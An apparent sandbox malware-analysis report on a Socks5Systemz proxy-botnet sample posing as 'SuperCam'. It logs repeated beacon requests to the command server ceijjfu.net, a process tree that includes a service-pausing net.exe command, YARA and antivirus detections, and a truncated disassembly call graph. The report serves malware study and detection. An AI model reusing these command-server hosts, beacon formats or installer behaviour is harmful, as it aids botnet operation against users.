                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  31192.168.2.449878185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:45.658651114 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:47.001017094 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:46 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  32192.168.2.449883185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:47.236442089 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:48.587502003 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:48 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  33192.168.2.449889185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:48.837505102 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:50.193795919 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:49 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Dec 25, 2024 09:18:50.303814888 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:50.780636072 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:50 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  34192.168.2.449895185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:51.025093079 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:52.378236055 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:52 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  35192.168.2.449897185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:52.611732960 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:53.961704016 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:53 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  36192.168.2.449902185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:54.189850092 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:55.538913965 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:55 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  37192.168.2.449908185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:55.784058094 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:57.140731096 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:56 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  38192.168.2.449914185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:57.611469030 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:18:58.960964918 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:18:58 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  39192.168.2.449916185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:18:59.207109928 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:19:00.565427065 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:19:00 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  40192.168.2.449921185.196.9.67806176C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 25, 2024 09:19:00.800928116 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608dfa10c1eb939d32 HTTP/1.1
                                                  Host: ceijjfu.net
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Dec 25, 2024 09:19:02.159826040 CET229INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0 (Ubuntu)
                                                  Date: Wed, 25 Dec 2024 08:19:01 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:03:16:57
                                                  Start date:25/12/2024
                                                  Path:C:\Users\user\Desktop\vc8Kx5C54G.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\vc8Kx5C54G.exe"
                                                  Imagebase:0x400000
                                                  File size:3'775'914 bytes
                                                  MD5 hash:2A64B62E8ED1C42A2487233E83D9966D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:1
                                                  Start time:03:16:57
                                                  Start date:25/12/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\is-JVEFI.tmp\vc8Kx5C54G.tmp" /SL5="$10414,3527699,54272,C:\Users\user\Desktop\vc8Kx5C54G.exe"
                                                  Imagebase:0x400000
                                                  File size:704'000 bytes
                                                  MD5 hash:04B1C24DA7892C010556F7B7C0E3160A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000002.2920111752.00000000058C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 4%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:2
                                                  Start time:03:16:58
                                                  Start date:25/12/2024
                                                  Path:C:\Windows\SysWOW64\net.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\system32\net.exe" pause super_cam_11234
                                                  Imagebase:0x870000
                                                  File size:47'104 bytes
                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:03:16:58
                                                  Start date:25/12/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:03:16:58
                                                  Start date:25/12/2024
                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\net1 pause super_cam_11234
                                                  Imagebase:0xeb0000
                                                  File size:139'776 bytes
                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:03:16:58
                                                  Start date:25/12/2024
                                                  Path:C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe" -i
                                                  Imagebase:0x400000
                                                  File size:3'562'941 bytes
                                                  MD5 hash:002737DAE0350F10594A62D75616F208
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000005.00000002.2920155792.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000005.00000000.1687909842.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000005.00000002.2920022648.0000000002752000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\SuperCam 1.1.2002.33\supercam360.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 74%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:21%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:2.4%
                                                    Total number of Nodes:1499
                                                    Total number of Limit Nodes:22
                                                    execution_graph 4983 409c40 5024 4030dc 4983->5024 4985 409c56 5027 4042e8 4985->5027 4987 409c5b 5030 40457c GetModuleHandleA GetProcAddress 4987->5030 4993 409c6a 5047 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4993->5047 5010 409d43 5109 4074a0 5010->5109 5012 409d05 5012->5010 5142 409aa0 5012->5142 5013 409d84 5113 407a28 5013->5113 5014 409d69 5014->5013 5015 409aa0 4 API calls 5014->5015 5015->5013 5017 409da9 5123 408b08 5017->5123 5021 409def 5022 408b08 21 API calls 5021->5022 5023 409e28 5021->5023 5022->5021 5152 403094 5024->5152 5026 4030e1 GetModuleHandleA GetCommandLineA 5026->4985 5029 404323 5027->5029 5153 403154 5027->5153 5029->4987 5031 404598 5030->5031 5032 40459f GetProcAddress 5030->5032 5031->5032 5033 4045b5 GetProcAddress 5032->5033 5034 4045ae 5032->5034 5035 4045c4 SetProcessDEPPolicy 5033->5035 5036 4045c8 5033->5036 5034->5033 5035->5036 5037 4065b8 5036->5037 5166 405c98 5037->5166 5046 406604 6F551CD0 5046->4993 5048 4090f7 5047->5048 5294 406fa0 SetErrorMode 5048->5294 5053 403198 4 API calls 5054 40913c 5053->5054 5055 409b30 GetSystemInfo VirtualQuery 5054->5055 5056 409be4 5055->5056 5059 409b5a 5055->5059 5061 409768 5056->5061 5057 409bc5 VirtualQuery 5057->5056 5057->5059 5058 409b84 VirtualProtect 5058->5059 5059->5056 5059->5057 5059->5058 5060 409bb3 VirtualProtect 5059->5060 5060->5057 5304 406bd0 GetCommandLineA 5061->5304 5063 409825 5065 4031b8 4 API calls 5063->5065 5064 406c2c 6 API calls 5068 409785 5064->5068 5066 40983f 5065->5066 5069 406c2c 5066->5069 5067 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5067->5068 5068->5063 5068->5064 5068->5067 5070 406c53 GetModuleFileNameA 5069->5070 5071 406c77 GetCommandLineA 5069->5071 5072 403278 4 API calls 5070->5072 5073 406c7c 5071->5073 5074 406c75 5072->5074 5075 406c81 5073->5075 5076 406af0 4 API calls 5073->5076 5079 406c89 5073->5079 5077 406ca4 5074->5077 5078 403198 4 API calls 5075->5078 5076->5073 5080 403198 4 API calls 5077->5080 5078->5079 5081 40322c 4 API calls 5079->5081 5082 406cb9 5080->5082 5081->5077 5083 4031e8 5082->5083 5084 4031ec 5083->5084 5085 4031fc 5083->5085 5084->5085 5087 403254 4 API calls 5084->5087 5086 403228 5085->5086 5088 4025ac 4 API calls 5085->5088 5089 4074e0 5086->5089 5087->5085 5088->5086 5090 4074ea 5089->5090 5325 407576 5090->5325 5328 407578 5090->5328 5091 407516 5092 40752a 5091->5092 5331 40748c GetLastError 5091->5331 5096 409bec FindResourceA 5092->5096 5097 409c01 5096->5097 5098 409c06 SizeofResource 5096->5098 5099 409aa0 4 API calls 5097->5099 5100 409c13 5098->5100 5101 409c18 LoadResource 5098->5101 5099->5098 5102 409aa0 4 API calls 5100->5102 5103 409c26 5101->5103 5104 409c2b LockResource 5101->5104 5102->5101 5105 409aa0 4 API calls 5103->5105 5106 409c37 5104->5106 5107 409c3c 5104->5107 5105->5104 5108 409aa0 4 API calls 5106->5108 5107->5012 5139 407918 5107->5139 5108->5107 5110 4074b4 5109->5110 5111 4074c4 5110->5111 5112 4073ec 20 API calls 5110->5112 5111->5014 5112->5111 5114 407a35 5113->5114 5115 405880 4 API calls 5114->5115 5116 407a89 5114->5116 5115->5116 5117 407918 InterlockedExchange 5116->5117 5118 407a9b 5117->5118 5119 405880 4 API calls 5118->5119 5120 407ab1 5118->5120 5119->5120 5121 405880 4 API calls 5120->5121 5122 407af4 5120->5122 5121->5122 5122->5017 5127 408b82 5123->5127 5136 408b39 5123->5136 5124 408bcd 5439 407cb8 5124->5439 5126 408be4 5130 4031b8 4 API calls 5126->5130 5127->5124 5129 4034f0 4 API calls 5127->5129 5134 403420 4 API calls 5127->5134 5135 4031e8 4 API calls 5127->5135 5138 407cb8 21 API calls 5127->5138 5129->5127 5132 408bfe 5130->5132 5131 4031e8 4 API calls 5131->5136 5149 404c10 5132->5149 5133 403420 4 API calls 5133->5136 5134->5127 5135->5127 5136->5127 5136->5131 5136->5133 5137 407cb8 21 API calls 5136->5137 5430 4034f0 5136->5430 5137->5136 5138->5127 5465 4078c4 5139->5465 5143 409ac1 5142->5143 5144 409aa9 5142->5144 5145 405880 4 API calls 5143->5145 5146 405880 4 API calls 5144->5146 5148 409ad2 5145->5148 5147 409abb 5146->5147 5147->5010 5148->5010 5150 402594 4 API calls 5149->5150 5151 404c1b 5150->5151 5151->5021 5152->5026 5154 403164 5153->5154 5155 40318c TlsGetValue 5153->5155 5154->5029 5156 403196 5155->5156 5157 40316f 5155->5157 5156->5029 5161 40310c 5157->5161 5159 403174 TlsGetValue 5160 403184 5159->5160 5160->5029 5162 403120 LocalAlloc 5161->5162 5163 403116 5161->5163 5164 40313e TlsSetValue 5162->5164 5165 403132 5162->5165 5163->5162 5164->5165 5165->5159 5238 405930 5166->5238 5169 405270 GetSystemDefaultLCID 5172 4052a6 5169->5172 5170 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5170->5172 5171 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5171->5172 5172->5170 5172->5171 5173 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5172->5173 5174 405308 5172->5174 5173->5172 5175 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5174->5175 5176 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5174->5176 5177 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5174->5177 5178 40538b 5174->5178 5175->5174 5176->5174 5177->5174 5272 4031b8 5178->5272 5181 4053b4 GetSystemDefaultLCID 5276 4051fc GetLocaleInfoA 5181->5276 5184 4031e8 4 API calls 5185 4053f4 5184->5185 5186 4051fc 5 API calls 5185->5186 5187 405409 5186->5187 5188 4051fc 5 API calls 5187->5188 5189 40542d 5188->5189 5282 405248 GetLocaleInfoA 5189->5282 5192 405248 GetLocaleInfoA 5193 40545d 5192->5193 5194 4051fc 5 API calls 5193->5194 5195 405477 5194->5195 5196 405248 GetLocaleInfoA 5195->5196 5197 405494 5196->5197 5198 4051fc 5 API calls 5197->5198 5199 4054ae 5198->5199 5200 4031e8 4 API calls 5199->5200 5201 4054bb 5200->5201 5202 4051fc 5 API calls 5201->5202 5203 4054d0 5202->5203 5204 4031e8 4 API calls 5203->5204 5205 4054dd 5204->5205 5206 405248 GetLocaleInfoA 5205->5206 5207 4054eb 5206->5207 5208 4051fc 5 API calls 5207->5208 5209 405505 5208->5209 5210 4031e8 4 API calls 5209->5210 5211 405512 5210->5211 5212 4051fc 5 API calls 5211->5212 5213 405527 5212->5213 5214 4031e8 4 API calls 5213->5214 5215 405534 5214->5215 5216 4051fc 5 API calls 5215->5216 5217 405549 5216->5217 5218 405566 5217->5218 5219 405557 5217->5219 5221 40322c 4 API calls 5218->5221 5290 40322c 5219->5290 5222 405564 5221->5222 5223 4051fc 5 API calls 5222->5223 5224 405588 5223->5224 5225 4055a5 5224->5225 5226 405596 5224->5226 5227 403198 4 API calls 5225->5227 5228 40322c 4 API calls 5226->5228 5229 4055a3 5227->5229 5228->5229 5284 4033b4 5229->5284 5231 4055c7 5232 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5231->5232 5233 4055e1 5232->5233 5234 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5233->5234 5235 4055fb 5234->5235 5236 405ce4 GetVersionExA 5235->5236 5237 405cfb 5236->5237 5237->5046 5239 40593c 5238->5239 5246 404ccc LoadStringA 5239->5246 5242 4031e8 4 API calls 5243 40596d 5242->5243 5249 403198 5243->5249 5253 403278 5246->5253 5250 4031b7 5249->5250 5251 40319e 5249->5251 5250->5169 5251->5250 5267 4025ac 5251->5267 5258 403254 5253->5258 5255 403288 5256 403198 4 API calls 5255->5256 5257 4032a0 5256->5257 5257->5242 5259 403274 5258->5259 5260 403258 5258->5260 5259->5255 5263 402594 5260->5263 5262 403261 5262->5255 5264 402598 5263->5264 5265 4025a2 5263->5265 5264->5265 5266 403154 4 API calls 5264->5266 5265->5262 5265->5265 5266->5265 5268 4025ba 5267->5268 5270 4025b0 5267->5270 5268->5250 5269 402632 5269->5269 5270->5268 5270->5269 5271 403154 4 API calls 5270->5271 5271->5269 5274 4031be 5272->5274 5273 4031e3 5273->5181 5274->5273 5275 4025ac 4 API calls 5274->5275 5275->5274 5277 405223 5276->5277 5278 405235 5276->5278 5279 403278 4 API calls 5277->5279 5280 40322c 4 API calls 5278->5280 5281 405233 5279->5281 5280->5281 5281->5184 5283 405264 5282->5283 5283->5192 5285 4033bc 5284->5285 5286 403254 4 API calls 5285->5286 5287 4033cf 5286->5287 5288 4031e8 4 API calls 5287->5288 5289 4033f7 5288->5289 5292 403230 5290->5292 5291 403252 5291->5222 5292->5291 5293 4025ac 4 API calls 5292->5293 5293->5291 5302 403414 5294->5302 5297 406fee 5298 407284 FormatMessageA 5297->5298 5299 4072aa 5298->5299 5300 403278 4 API calls 5299->5300 5301 4072c7 5300->5301 5301->5053 5303 403418 LoadLibraryA 5302->5303 5303->5297 5311 406af0 5304->5311 5306 406bf3 5307 406c05 5306->5307 5308 406af0 4 API calls 5306->5308 5309 403198 4 API calls 5307->5309 5308->5306 5310 406c1a 5309->5310 5310->5068 5312 406b1c 5311->5312 5313 403278 4 API calls 5312->5313 5314 406b29 5313->5314 5321 403420 5314->5321 5316 406b31 5317 4031e8 4 API calls 5316->5317 5318 406b49 5317->5318 5319 403198 4 API calls 5318->5319 5320 406b6b 5319->5320 5320->5306 5322 403426 5321->5322 5324 403437 5321->5324 5323 403254 4 API calls 5322->5323 5322->5324 5323->5324 5324->5316 5326 407578 5325->5326 5327 4075b7 CreateFileA 5326->5327 5327->5091 5329 403414 5328->5329 5330 4075b7 CreateFileA 5329->5330 5330->5091 5334 4073ec 5331->5334 5335 407284 5 API calls 5334->5335 5336 407414 5335->5336 5337 407434 5336->5337 5343 405184 5336->5343 5346 405880 5337->5346 5340 407443 5341 403198 4 API calls 5340->5341 5342 407460 5341->5342 5342->5092 5350 405198 5343->5350 5347 405887 5346->5347 5348 4031e8 4 API calls 5347->5348 5349 40589f 5348->5349 5349->5340 5351 4051b5 5350->5351 5358 404e48 5351->5358 5354 4051e1 5356 403278 4 API calls 5354->5356 5357 405193 5356->5357 5357->5337 5361 404e63 5358->5361 5359 404e75 5359->5354 5363 404bd4 5359->5363 5361->5359 5366 404f6a 5361->5366 5373 404e3c 5361->5373 5364 405930 5 API calls 5363->5364 5365 404be5 5364->5365 5365->5354 5367 404f7b 5366->5367 5370 404fc9 5366->5370 5369 40504f 5367->5369 5367->5370 5372 404fe7 5369->5372 5380 404e28 5369->5380 5370->5372 5376 404de4 5370->5376 5372->5361 5374 403198 4 API calls 5373->5374 5375 404e46 5374->5375 5375->5361 5377 404df2 5376->5377 5383 404bec 5377->5383 5379 404e20 5379->5370 5396 4039a4 5380->5396 5386 4059a0 5383->5386 5385 404c05 5385->5379 5387 4059ae 5386->5387 5388 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5387->5388 5389 4059d8 5388->5389 5390 405184 19 API calls 5389->5390 5391 4059e6 5390->5391 5392 4031e8 